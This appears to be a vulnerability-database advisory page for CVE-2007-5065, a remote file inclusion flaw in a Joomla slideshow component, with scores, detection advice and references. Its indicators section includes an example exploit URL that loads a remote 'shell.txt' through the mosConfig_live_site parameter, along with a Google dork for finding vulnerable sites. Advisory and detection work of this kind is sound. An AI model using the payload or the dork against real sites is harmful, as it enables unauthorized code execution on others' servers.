CVE-2007-5065
published 2007-09-24CVE-2007-5065: PHP remote file inclusion vulnerability in admin.slideshow1.php in the Flash Slide Show (com_slideshow) component for Joomla! allows remote attackers to…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
42.31%
98.5th percentile
PHP remote file inclusion vulnerability in admin.slideshow1.php in the Flash Slide Show (com_slideshow) component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter.
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt↗
- →Detect RFI exploitation attempts targeting the mosConfig_live_site parameter in admin.slideshow1.php — look for HTTP requests containing an external URL value in this parameter ↗
- →Use Google dork 'inurl:/com_slideshow/' to identify exposed vulnerable Joomla installations; monitor for this pattern in web server access logs as a reconnaissance indicator ↗
- ·The vulnerable include is on line 3 of admin.slideshow1.php, meaning exploitation occurs very early in script execution with no prior authentication or sanitization checks ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/38157http://www.securityfocus.com/bid/25760https://exchange.xforce.ibmcloud.com/vulnerabilities/36719https://www.exploit-db.com/exploits/4440http://osvdb.org/38157http://www.securityfocus.com/bid/25760https://exchange.xforce.ibmcloud.com/vulnerabilities/36719https://www.exploit-db.com/exploits/4440
2007-09-24
Published